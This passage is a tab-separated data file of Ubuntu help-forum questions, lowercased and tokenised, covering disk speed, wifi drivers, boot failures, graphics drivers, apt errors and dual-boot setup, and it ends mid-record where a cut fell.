332745	why are all hard drives slow on my ubuntu system ?	on my computer , which dual-boots ubuntu 12.04 lts ( kernel 3.5 ) and windows 7 , the hard drive speed is very fast on windows but very slow on ubuntu . the slowness remains when i boot on an ubuntu live cd for 13.04 ( kernel 3.8 ) and prerelease 13.10 ( kernel 3.11 ) . however , when i boot on knoppix ( kernel 3.9 ) , the slowness goes away ! anybody know why , or how it can be fixed in ubuntu ? here are the speeds using exactly the same hardware : ubuntu 12.04 lts , 13.04 , 13.10 : about 1 mb/sec , estimated using /bin/du while copying files . windows 7 : 168 mb/second as reported by windows knoppix : about the same as windows , definitely over 100mb/sec the slowness happens on both internal and external drives : the internal ssd raid ( 3ware 9750-4i card ) , an internal western digital red ( not on the raid card ) , and external drives using usb 3.0 , firewire , and esata . this computer itself has a very fast 6-core cpu and 32 gb ram , so computer power is not an issue . it 's a brand new computer so it 's possible something is configured wrong . trivia : originally , i thought the problem was limited to usb 3.0 , and my vendor ( endpcnoise.com ) guessed that the asmedia chipset on my computer is the culprit , because ubuntu 's support for it is `` rudimentary at best . '' some timing info : it takes 15 seconds to copy a 20 mb file to/from any disk in the system . here 's the ssd raid on ubuntu 13.04 live cd : $ time cp bigfile bigfile2 real 0m14.866s user 0m0.000s sys 0m0.056s when i boot into knoppix , the problem completely goes away : $ time cp bigfile bigfile2 real 0m0.034s user 0m0.000s sys 0m0.013s when i run dmesg /var/log/syslog before and after a copy like this , no additional messages get written . ( see full dmesg output . ) but i do see a few messages relating to the ssd being tested : ... [ 0.882760 ] lsi 3ware sas/sata-raid controller device driver for linux v3.26.02.000 . [ 0.883566 ] ahci 0000:00:1f.2 : version 3.0 [ 0.883643 ] ahci 0000:00:1f.2 : irq 80 for msi/msi-x [ 0.889807 ] e1000e : intel ( r ) pro/1000 network driver - 2.0.0-k [ 0.889809 ] e1000e : copyright ( c ) 1999 - 2012 intel corporation . [ 0.891377 ] xor : automatically using best checksumming function : [ 0.899068 ] ahci 0000:00:1f.2 : ahci 0001.0300 32 slots 6 ports 6 gbps 0x31 impl sata mode [ 0.899071 ] ahci 0000:00:1f.2 : flags : 64bit ncq sntf pm led clo pio slum part ems apst [ 0.899074 ] ahci 0000:00:1f.2 : setting latency timer to 64 ... [ 1.234773 ] ata1 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) [ 1.234785 ] ata7 : sata link down ( sstatus 0 scontrol 300 ) [ 1.234802 ] ata6 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 1.234820 ] ata5 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) ... [ 1.990817 ] sd 0:0:0:0 : attached scsi generic sg3 type 0 [ 1.990833 ] sd 0:0:0:0 : [ sdb ] 1874978816 512-byte logical blocks : ( 959 gb/894 gib ) [ 1.993034 ] sd 0:0:0:0 : [ sdb ] write protect is off [ 1.993036 ] sd 0:0:0:0 : [ sdb ] mode sense : 23 00 10 00 [ 1.993158 ] sd 0:0:0:0 : [ sdb ] write cache : enabled , read cache : enabled , supports dpo and fua [ 1.995812 ] sdb : sdb1 sdb2 sdb3 sdb4 < sdb5 > [ 2.000255 ] sd 0:0:0:0 : [ sdb ] attached scsi disk [ 2.292132 ] ext4-fs ( sdb1 ) : mounted filesystem with ordered data mode . opts : ( null ) ... [ 9.428287 ] 3w-sas : scsi0 : error : ( 0x03:0x0101 ) : invalid command opcode : opcode=0x85 . the last line is explained here . does this point to a root cause ? hdparm reports identical results on ubuntu 12.04 and knoppix , except for -q ( queue_depth ) , but changing it on ubuntu had no noticeable effect : $ sudo hdparm -acdgkmurabcmnqw /dev/sda /dev/sda : multcount = 16 ( on ) io_support = 1 ( 32-bit ) readonly = 0 ( off ) readahead = 256 ( on ) geometry = 364801/255/63 , sectors = 5860533168 , start = 0 look-ahead = 1 ( on ) apm_level = not supported drive state is : active/idle acoustic = not supported max sectors = 5860533168/5860533168 , hpa is disabled queue_depth = 31 ( knoppix had value = 1 , but changing on ubuntu did n't help ) write-caching = 1 ( on ) here is lshw : $ sudo lshw -c bus *-core description : motherboard product : p9x79 vendor : asustek computer inc. physical id : 0 version : rev 1.xx serial : 130410781200420 slot : to be filled by o.e.m . *-usb:0 description : usb controller product : x79 series chipset usb2 enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 06 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : fb627000-fb6273ff *-usb description : usb controller product : asm1042 superspeed usb host controller vendor : asmedia technology inc. physical id : 0 bus info : pci @ 0000:06:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : msi msix pm pciexpress xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:17 memory : fb400000-fb407fff *-usb description : usb controller product : asm1042 superspeed usb host controller vendor : asmedia technology inc. physical id : 0 bus info : pci @ 0000:07:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : msi msix pm pciexpress xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:19 memory : fb300000-fb307fff *-firewire description : firewire ( ieee 1394 ) product : vt6315 series firewire controller vendor : via technologies , inc. physical id : 0 bus info : pci @ 0000:09:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress ohci bus_master cap_list configuration : driver=firewire_ohci latency=0 resources : irq:17 memory : fb100000-fb1007ff ioport : b000 ( size=256 ) *-usb:1 description : usb controller product : x79 series chipset usb2 enhanced host controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 06 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : fb626000-fb6263ff *-serial unclaimed description : smbus product : x79 series chipset smbus host controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 06 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : fb624000-fb6240ff ioport : f000 ( size=32 )
332746	hp pavilion zv6000 ubuntu kernel crash	ubuntu dumps the call stack/crashes . steps i 've taken . i tried installing from a disc image , the install never made it past the option to `` install along side windows xp '' - it dumped the callstack before actually installing . i tried 3 different cd image burns , just to make sure the iso was n't corrupt . i then `` successfully '' installed ubunto 12.04.2 using the windows installer . no wireless availability , and no wireless driver was listed as being `` missing '' in the `` install drivers '' list . i tried using the terminal to apt-get and install the correct bcm4318 driver ( for the broadcomm wireless bcm3418 rev 02 on this machine ) , but it kernel dumped . i had to uninstall/reinstal ubuntu completely to prevent ubuntu from just dumping after any reboot attempt . `` successfully '' uninstalled then reinstalled ubuntu using the windows installer . this time , the wireless sta driver listed under the `` install drivers '' . however , 3/4 through installation , another kernel dump . rebooted , ubuntu kernel dumps after being loaded for approximately 2-3 minutes . i suspect the wireless driver being incorrect/missing/etc , along with possibly other kernel package problems , are behind this constant kernel dumping . i have tried booting into recovery and running the `` fix broken packages '' option , but that also resulted in a kernel dump . help ? !
332750	bcm4313 eats up all the wifi	i have a problem similar to this : while using internet on ubuntu , all other computers get bad internet connection so the problem is , whenever i log onto ubuntu internet , all other computers internet speeds goes down drastically . we have 20 mbps download and 2 upload . however , when i log onto ubuntu i can still get this on this computer but all other computers go to about .2 mbps upload . when i log into windows on the same machine the internet works fine on all other computers . i tried the fix mentioned in that post i.e . i tried `` sudo iw reg set us '' in vain . os : 13.04 network card : *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:12:00.0 logical name : eth1 version : 01 serial : c0 : cb:38:0f : b4:50 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) ip=204.140.128.251 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : fbd00000-fbd03fff ifconfig : eth0 link encap : ethernet hwaddr f0:4d : a2:94:2a:8a up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth1 link encap : ethernet hwaddr c0 : cb:38:0f : b4:50 inet addr:204.140.128.251 bcast:204.140.131.255 mask:255.255.252.0 inet6 addr : fe80 : :c2cb:38ff : fe0f : b450/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:6229 errors:1 dropped:0 overruns:0 frame:15408 tx packets:5608 errors:11 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5849916 ( 5.8 mb ) tx bytes:1117895 ( 1.1 mb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:842 errors:0 dropped:0 overruns:0 frame:0 tx packets:842 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:118319 ( 118.3 kb ) tx bytes:118319 ( 118.3 kb ) dmesg output is pasted here : http : //paste.ubuntu.com/5987128/ . one thing i have noticed is after i do the iw reg set us it appends the following to dmesg output : [ 805.955556 ] cfg80211 : calling crda for country : us [ 805.963964 ] cfg80211 : regulatory domain changed to country : us [ 805.963973 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 805.963980 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 805.963987 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 805.963993 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 805.963999 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 805.964005 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 805.964010 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) which is automatically removed after every reboot . any advice or debugging assistance will be greatly appreciated ! thanks ! !
332752	how can i recover the files deleted from a folder synchronized with ubuntu one ?	if i delete files from a folder synchronized with ubuntu one , or they get deleted by some problem on the machine , how can i recover them ?
332755	ca n't install on amd systems	i have a 32 bit 11.10 hdd in my pc , but i 'm trying to change to 64 bit so i can take advantage of my 16 gigs of ram . for some reason , booting from this system , ( a gaming pc i built myself ) at least , off usb , just will not work . i 'm using iso to usb to create the bootable usb on a 16gb usb flash drive . when i boot the system off the usb , it starts up , does the normal ubuntu loading screen , then , instead of loading the desktop , it says `` filesystem not found '' or something of the likes . i 'm going to put the hdd in an old intel system and try to install it from there . ( i 've installed ubuntu on that system before , so i know it works ) specs of pc : cpu-amd phenom ii x4 965 @ 3.9ghz gpu-ati radeon hd 6670 ram- 16gb 1600mhz corsair vengeance mobo-gigabyte ga-970a ds3 psu-cooler master extreme 500w ps- i would like to install 13.04 , although i 've put the 11.10 64bit iso on the usb drive , and plan to update it once installed . i am unable to type help , as the keyboard is disabled at this screen . ( ca n't even toggle num/caps/scroll lock )
332759	ubuntu 13.04 wo n't boot after new amd catalyst center	i am far from an experienced linux user . i uninstalled the latest catalyst center and installed the new amd beta driver . the installation seemed to go fine then it said i should restart to avoid instability . i restarted and then the purple screen comes up for a second , some message flashes too quickly for me to read . then it goes into a black screen with the blinking cursor . nothing i type on the keyboard registers . i 've looked up and down for solutions but everything i 've found about boot problems says i need to get into the terminal and type commands ... . i ca n't even get there . i tried holding shift while computer was booting as i saw that in a thread saying it will help load some sort of safe mode . what do i do ?
332762	radeon.dpm=1 invalid on 13.04 w/4850	i 'm trying 13.04 using the open source radeon drives ( i think that 's the same as gallium but correct me if i 'm confused ) . this is on an 4850 card , so would need legacy proprietary drivers , which are n't 13.04 compatible ( i did the xserver downgrade to use them on 12.04 but do n't want to go that route on 13.04 ) . the drivers are working except i ca n't get the fan/power settings to change . i tried adding radeon.dpm=1 to grub , but i get this error in syslog at boot ( and the system comes up with poor ( 2d ? ) graphics ) : aug 14 20:26:23 xxxx-xxxx kernel : [ 5.115756 ] radeon : `1 ' invalid for parameter `dpm' here 's some info from a few commands that might help identify if i 'm doing something wrong . any ideas would be greatly appreciated . lshw -c video *-display description : vga compatible controller product : rv770 [ radeon hd 4850 ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:46 memory : d0000000-dfffffff memory : fe8e0000-fe8effff ioport : b000 ( size=256 ) memory : fe8c0000-fe8dffff modinfo radeon filename : /lib/modules/3.8.0-19-generic/kernel/drivers/gpu/drm/radeon/radeon.ko license : gpl and additional rights description : ati radeon author : gareth hughes , keith whitwell , others . < bunch of firmware listing > radeon/rv710_pfp.bin firmware : radeon/rv730_me.bin firmware : radeon/rv730_pfp.bin firmware : radeon/rv770_me.bin firmware : radeon/rv770_pfp.bin firmware : radeon/rs780_me.bin firmware : radeon/rs780_pfp.bin firmware : radeon/rv670_me.bin firmware : radeon/rv670_pfp.bin < bunch of firmware listing > srcversion : 9f592710cb27b4a29ee5630 < bunch of alias pci : listings > depends : drm , drm_kms_helper , ttm , i2c-algo-bit intree : y vermagic : 3.8.0-19-generic smp mod_unload modversions parm : no_wb : disable agp writeback for scratch registers ( int ) parm : modeset : disable/enable modesetting ( int ) parm : dynclks : disable/enable dynamic clocks ( int ) parm : r4xx_atom : enable atombios modesetting for r4xx ( int ) parm : vramlimit : restrict vram for testing ( int ) parm : agpmode : agp mode ( -1 == pci ) ( int ) parm : gartsize : size of pcie/igp gart to setup in megabytes ( 32 , 64 , etc ) ( int ) parm : benchmark : run benchmark ( int ) parm : test : run tests ( int ) parm : connector_table : force connector table ( int ) parm : tv : tv enable ( 0 = disable ) ( int ) parm : audio : audio enable ( 1 = enable ) ( int ) parm : disp_priority : display priority ( 0 = auto , 1 = normal , 2 = high ) ( int ) parm : hw_i2c : hw i2c engine enable ( 0 = disable ) ( int ) parm : pcie_gen2 : pcie gen2 mode ( -1 = auto , 0 = disable , 1 = enable ) ( int ) parm : msi : msi support ( 1 = enable , 0 = disable , -1 = auto ) ( int ) parm : lockup_timeout : gpu lockup timeout in ms ( defaul 10000 = 10 seconds , 0 = disable ) ( int )
332764	is there some sort of all-purpose logging tool i can download as a package ?	as in , a tool that will give me easy to read logging information all in one convenient place , divvied up into categories . logs for say , ssh daemon , user logins/logouts and other activity , installed applications , etc . i 'm just having a bit of trouble sorting through the existing logs for exactly what i 'm looking for because they are usually just a giant jumble of things . in osx for example , the console can be filtered by a text string but even that is n't too ideal ; it would be nice if they were separated from the jump . like some sort of directory where i can monitor everything important . any suggestions ? i 'm running a headless version of ubuntu server edition 12 btw . thanks !
332765	a question about wifi 13.04	i have a toshiba satellite computer ... i have ubuntu 13.04 installed and my wifi is lower than what it is when i had windows 8 . i was wondering if there was some way that i could fix it so i could have a better connection ... any help would be greatly appreciated
332766	how can i install pflogsumm for postfix mail log analyzer ?	i am useing postfix mail server in ubuntu 13.04 . i want to install pflogsumm in my server and analyze the mail log . how can i do this ?
332769	how to make graphics / video appear on websites that use adobe flash ?	i installed version 13.04 on my dell studio xps laptop and have been using it fine . i explain to my wife that we need to switch to ubuntu and stop using windows . she agrees , so i install ubuntu 13.04 on my dell inspiron 530 desktop with new nvidia 610 graphics card . and it all looks great . she sits a the computer to start working and the first page she goes to in firefox is our timeshare to book something and the map of locations does not show up . instead it has a link saying we need to install adobe flash player . when i click on the link ot take me to adobe download page and recognizes i 'm running linux . it suggests several options or versions of linux based flash players . when i click download a box pops up wanting to know what application i want to use to run the application . with no application listed ? ? ? ? ? ? this is not helpful and i do n't know what to do ? any help would be great . i tried searches to no avail . wife is not impressed with ubuntu already ! ! !
332771	how do i extract the package version from debian/changelog ?	what 's the most robust way to parse a source package 's debian/changelog file ( or debian/control ? ) to get the package 's version number ? something like : pkgver= $ ( dpkg-parsechangelog | magic_goes_here ) i want to extract the version number ( and only the version number ) so that i can manipulate it in a script . i was expecting to find a dpkg-* utility for this purpose , but i have n't found one yet .
332773	alternative for dual booting	i am starting to like ubuntu so much and i am in the process of learning the shell commands/scripts . but the place where i work , they are not allowing for dual booting option for my existing windows laptop . in my home laptop , i installed ubuntu from a flash drive . is it possible for me to carry this flash drive as a portable os to my office laptop without damaging the existing windows os in it ?
332775	toshiba c855d satellite - update problem	i 've installed ubuntu in my laptop , dualbooting with backtrack , i try to update this ubuntu , but even i did it , my laptop got hang and lag , i wait until done , but just showing that that update was not succesful , and it 's so hard to shutdown my laptop , so i turn with shutdown button . main point is that i ca n't update my ubuntu 12.04 and even i try it 's going lag and it 's distrubing so much . thanks , maybe someone here can help me .
332778	how to change file size calculation in nautilus from `` decimal prefix '' back to the normal `` binary prefix '' ?	ubuntu has used the `` base-10 '' units policy for almost 3 years now , and being a full ubuntu user from the awesome 10.10 , personally i never was able to relate with it ! i 'm not going to talk about how right/wrong this decision was in my opinion and many other ubuntu users . instead my question is if there is a clean solution to make the whole system or at least nautilus use the `` base-2 '' or `` binary-prefix '' ? i 've seen this post , which the answer states that there is no solution to this problem ( unless modifying the entire source of ubuntu ! ! ) but that post is old and for the times of ubuntu-11.10 . i was wondering if there has been any changes since then ? not to mention that another post in that question states that kde is able to do this in the system settings ! if this is true , why not also put an option in unity ? ! i 'm mostly an lts user , currently using ubuntu-12.04 ( and looking forward to 14.04 ) . if there is n't a way to configure the whole system to use the `` binary-prefix '' , can i at least configure nautilus to do this ?
332791	minecraft lag/low fps on 13.04 ( problem did n't exist on 11.10 )	in minecraft i am getting un-playable frame rates . my system is way over the recommended specs . below are my specs : geforce gtx 560 and geforce gtx 460 in an sli amd phenom ii x6 1100t processor 8gb ddr3 synchronous 1333 mhz ocz vertex 3 ssd i never had these problems in 11.10 , but i did a fresh install of 13.04 and started having these problems . back then i could run 512x texture packs with zero lag , but now i ca n't even run the default texture pack without lag . i have also tried running older versions of minecraft , and have also tried openjdk 6 & 7 , and also sun java 6 , 7 , & 8 . what should i do ? go back to 11.10 ?
332792	skype [ 4.2.0.11 ] - black video on kde - 13.04 32bit	i have this strange issue with skype : using unity and other de ( lxde/e17 ) everything works fine using kde/be : :shell i have black screen in the video/webcam box ( also in option in video tab ) i suspect that the issue is caused by some missing library to be loaded so i have tried this fix but without any success : ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so /usr/bin/skype & i 'm on ubuntu 13.04 32bit and skype version is 4.2.0.11 update : i have just tried the dynamic package and i have the same issue with it , now i 'm confused about what could be the cause qt ? or some other libs ?
332793	netflix desktop install trouble `` some packages could not be installed ''	i 'm having a massive issue with trying to install the netflix desktop app . i have added the repository ( roughly four times , with updates ) and everytime i get the following message azazel @ azazel-aspire-5733z : ~/downloads $ sudo apt-get install netflix-desktop reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : netflix-desktop : depends : wine-browser-installer ( = 0.8.1~saucy ) but it is not going to be installed depends : wine-silverlight4-installer but it is not going to be installed e : unable to correct problems , you have held broken packages . i would really like to be able to watch netflix , as my virtual machine is n't working . any ideas on how to fix this ?
332795	can not boot into windows 8 after deleting ubuntu 13.04 partition ( no windows 8 install disk )	i accidentally deleted my ubuntu partition on my windows pc and i 'm stuck on the grub boot screen . error : unknown filesystem . grub rescue > i do not have a windows 8 installation cd with me as the laptop was not provided with one ( pre-installed os ) i also do n't have any access to any sort of removable media like a disk but i do have a 12 or so gb flash drive with me . also , i can access the bios just fine , if that is pertinent to this . i 'd just like to access the traditional windows boot screen some how and i really have no idea what to do at this point . /** edit i had no idea that this may have been a duplicate of another question , although i did search for at least half an hour for media relevant to this to no avail . regardless , the other question you linked may solve the problem */
332797	how to fix error `` rm : command-not-found '' while processing install-info ( apt-get can not install any software ) ?	i am running my apt-get in a normal way but today i got some errors while using the apt-get command can anyone suggest any enhancement that i need to make in my configuration files to fix it . i have run this command $ sudo apt-get install firefox or before also i tried to update the packages using $ sudo apt-get update but i got this error : /usr/sbin/update-info-dir : line 51 : rm : command not found dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : install-info e : sub-process /usr/bin/dpkg returned an error code ( 1 )
332798	changing mouse acceleration and speed xinput	how do i disable mouse acceleration and still get my mouse to go fast ? the settings in the menu are too slow and do n't disable the acceleration fully . i 've tried doing xinput set-prop '11 ' 'device accel profile ' -1 and xinput set-prop '11 ' 'device accel constant deceleration ' 1/5 . although it gets rid of the acceleration the mouse moves very slow now . even xset m 2 0 does n't change anything after i enter the xinput codes . how can i increase mouse speed while getting rid of mouse acceleration ? i 'm using ubuntu 12.04 lts .
332800	how do i fully expand the window showing the running operating system inside virtualbox ?	i 'm running win7 64 bit on virtualbox and it only takes up half the screen . how can i expand it further ?
332801	ubuntu ca n't see windows 7 partition when installing 13.04	ubuntu @ ubuntu : ~ $ sudo fdisk -lu warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xd033d792 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 986601471 493197312 7 hpfs/ntfs/exfat /dev/sda3 986601472 1953519615 483459072 7 hpfs/ntfs/exfat gparted /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? so when i try to install ubuntu i get a whole tb of unallocated disk . however i can see the 2 partitions mounted on ubuntu when i run `` try ubuntu '' i 've created the ntfs partition on /dev/sda3 in an effort to fix the guid table without success . is there any way to fix this so i can install ubuntu on /dev/sda3 ?
332805	missing install file , any other way to get it ?	i 've been trying to get my computer to dual boot windows and ubuntu for a few days now , and after a lot of troubleshooting and a lot of painful restarts , i 've found the error . i have been using the .iso through a usb , and after scanning the disk for errors and searching through files , 1 file is missing , which i 'm assuming is the cause of all my wasted hours reinstalling both oss : ./pool/main/g/grub2-signed/grub-efi-amd64-signed_1.9~ubuntu12.04.3+1.99-21ubuntu3.9_amd64.deb searching through the files on the usb ( from the iso ) , i found the above directory and confirmed that the file is in fact missing . i tried redownloading the iso ( from the ubuntu site ) , and the same file was missing . is there a way to manually retrieve get this file and just drop it into the right place , and would this get the install to work ? thanks in advance for any answers .
332807	automount flash drive lags	i have 1gb flash drive and on windows or other linux machines it works fine . but when i push flash drive in my usb port on ubuntu 13.04 3.8.0-29-generic , there is 1-3 minutes delay before automounting . please help me to figure out why it is happening
332808	is there synaptic in 13.04 ?	i am now using 12.10 version of ubuntu and i am about to install 13.04.i have a question.is there synaptic package manager in ubuntu 13.04 ?
332810	ubuntu 13.04 does not boot after update	as a complete newbie to linux , i just installed a brand new lenovo thinkpad x230 with ubuntu 13.04 from usb stick . downloaded the installer from ubuntu.com and put it on a stick . no issues . next day ( this is : yesterday ) , the system offered update , including a new kernel . i did the update and now booting stalls with a violet screen saying cryptsetup : evms_activate is not available pressing esc , i see in the text display reading all physical volumes . this may take a while ... no volume groups found no volume groups found in grub , i see two kernels offered , one 3.8.0-19-generic and one for recovery . the normal kernel behaves as said and the recovery kernel gives me long text log of the boot process , ending with cryptsetup : evms_activate is not available begin : waiting for encrypted source device [ 2.512095 ] usb 1-1.6 : new usb device found , idvendor=5986 , idproduct=02d2 ( the usb device turns out to be the webcam ) . after quite some time , the waiting for the device seems to and and it enters a built-in shell i have no clue what to do with . i have been advised to re-install , and i would happily do this when i had some indication that the issue wo n't happen again next time . until then i would prefer to learn how to deal with such situations and rescue w/o new install ... any ideas ?
332813	any apt command not found	i 'm trying to install various packages , such as mysql , but whenever i try to do '' sudo apt-get install mysql '' it says that the command can not be found . i only have access to the box via ssh , so any graphical interfaces have to be ruled out as solutions . any help ?
332814	skype messages sent when i was offline not delivered immediately	i 'm using skype 4.2 on ubuntu 13.04 . if a contact sends me a message when i 'm offline , i do n't receive it the moment i 'm back online . i only get them like 10-20 hours later ( apparently , when this contact becomes online as well ) . on windows it was n't like that . is there a way to fix this ? thank you
332815	how to edit sshd_config remotely ? a problem of incorrect permissions ?	i am trying to remotely edit sshd_config file using winscp and putty . unfortunately , i keep getting the following error- â can not overwrite remote file press delete to delete the file and create a new oneâ . i tried deleting , but i got a similar error . i also tried changing the permissions on the file , but i got the error - * can not change properties of file sshd_config . * i suspect i do n't have the correct permissions , but i 'm not sure what to do . i 've attached a pic of my permissions below . question what do i need to do to be able to overwrite sshd_config ? is it to do with my current permissions ?
332826	how can i remove ubuntu 13.04 while keeping the existing windows 7 intact ?	i installed 13.04 but it not installed correctly . i want to remove it and keep my windows os intact in the process .
332828	what is the easiest and secure way to install openstack ?	i 'm trying to test and understand openstack for learning purposes , but i cant find the simplest and secure way of install openstack on my virtual machine that is running ubuntu 12.04 lts .
332829	xampp is not working properly in ubuntu13.04	i am new to ubuntu operating system and i tried the xampp installation process like the following steps.. cd ~/downloads sudo mkdir -p /opt sudo tar xvfz xampp-linux-1.8.1.tar.gz -c /opt sudo /opt/lampp/lampp start after xampp start it is showing the following message starting xampp for linux 1.8.1 ... xampp : another web server daemon is already running . xampp : starting mysql ... xampp : another ftp daemon is already running . xampp for linux started . how can i solve this problem . any suggestions are acceptable ...
332830	attempting to install ubuntu on an hp touchsmart tm2	when i go into the setup utility i have the options : main , security , diagnostics , system configuration , exit this is different from what i 've seen online when trying to find a guide . but , in the system configuration option i have a boot options section . so , i click that . i have a boot order option , so i click that . i get the options : usb diskette on key/usb hard disk , notebook hard drive , usb cd/dvd rom drive , ! usb floppy , ! network adapter i tried selecting the usb diskette on key/usb hard disk but when i restart it tells me `` bootmgr is missing , restart '' i am at a loss . help ! thanks in advance . < 3
332831	ubuntu software center application extension	i want to make an application for ubuntu software center . so i wanted to know the type of files that can be packaged into the bundle . also wanted to know what languages are the applications published in the ubuntu software center are made of ? i am trying to use windows 7 and qt the ide to develop applications for ubuntu software center . is this possible , i.e if i develop an application on windows 7 platform will they run in ubuntu ? or should i have to use ubuntu only ?
332834	libreoffice 4.1 start center does not show in lubuntu	i have recently upgraded libreoffice to 4.1 . however , after the first attempt at installing it manually , it appears that i do not have as many options as i did in the previous version . i uninstalled then re installed libreoffice again to only have a limited amount of options available . is there any way to get the libreoffice start center to show in the start menu > office > drop down list ? i have also checked libreoffice 's website and see that math is available to open separately . but the only way to open it is through an already open lo program . i 'm running lubuntu 13.10 on a toshiba satellite a135-s4427 . [ update ] tried to add a screenshot of the office menu but i have to have 10 rep points to do so : (
332838	how can i fix display `` out of range '' message after install ?	after installing ubuntu server 12 , i get the message `` out of range '' from my monitor ( asus vh236h ) . the pc is a compaq proliant ml310 g1 . i have verified that it is up and running otherwise , by using ssh to access the computer remotely . this message happens at the point exactly prior to when the grub should appear . i can not see anything except the `` out of range '' from that point onward . using the install disc 's rescue mode to access terminal commands , i 've tried changing the /etc/default/grub file to several different resolutions , doing a sudo update-grub after , none of which worked . i thought maybe it 's the frequency that is the problem ( which i do n't know how to change ) but i have also tried uncommenting grub_terminal=console , but that did n't help either . edit : i saw in another post 's comments that grub does n't show unless you hold shift , so i tried that . i saw `` grub loading.. '' then my monitor started displaying `` out of range '' again , like before .
332842	how to make an install usb for windows on ubuntu ?	that 's basically it . i have a windows 7 .iso but i do n't actually have a dvd at the moment so i was wondering if it was possible to make a live usb using something like `` startup disk creator '' and put the .iso onto my 16gb usb . if not , what 's the best way to burn it to a dvd and i 'll buy some tomorrow . thanks .
332843	problem with text deletion in vi editor	when i am writing c code on the vi editor , i am not able to use the backspace keys or my arrow keys to delete or navigate through lines . some unexpected special characters occur on the screen that is on middle of my code and i am not able to delete them also . if i use my delete key , the whole code gets deleted . i have tried both insert mode using 'i ' and 'a ' . i am able to manage this situation for c programming by using the text editors but when i am creating lex and yacc programs , i find this awkward . can you please help me with this ?
332850	ubuntu 13.04 , kde 4.11 , ati fglrx 13.8 beta - opengl does n't work	i have just upgraded to ubuntu 13.04 with kernel 3.10.6 . after that i have updated my fglrx to 13.8 beta and after that i have added ppa : kubuntu-ppa/backports and i have upgraded my system . after reboot my effects settings changed to xrander , so i tried to apply new opengl 2.1,2.0 and 3.1 but none of them works . it says that `` it was not possible to activate effects using those options , check the x configuration or change the options about the composition type '' . here is my xorg.conf : http : //pastebin.com/raw.php ? i=d6mpuezv and my xorg.0.log : http : //pastebin.com/raw.php ? i=nxf80qmh this is the output of glxinfo : name of display : :0 setting of real/effective user id to 0/0 failed libgl error : open uki failed ( operation not permitted ) libgl error : reverting to ( slow ) indirect rendering display : :0 screen : 0 direct rendering : no ( if you want to find out why , try setting libgl_debug=verbose ) server glx vendor string : ati server glx version string : 1.4 server glx extensions : glx_arb_multisample , glx_ext_import_context , glx_ext_texture_from_pixmap , glx_ext_visual_info , glx_ext_visual_rating , glx_oml_swap_method , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group client glx vendor string : ati client glx version string : 1.4 client glx extensions : 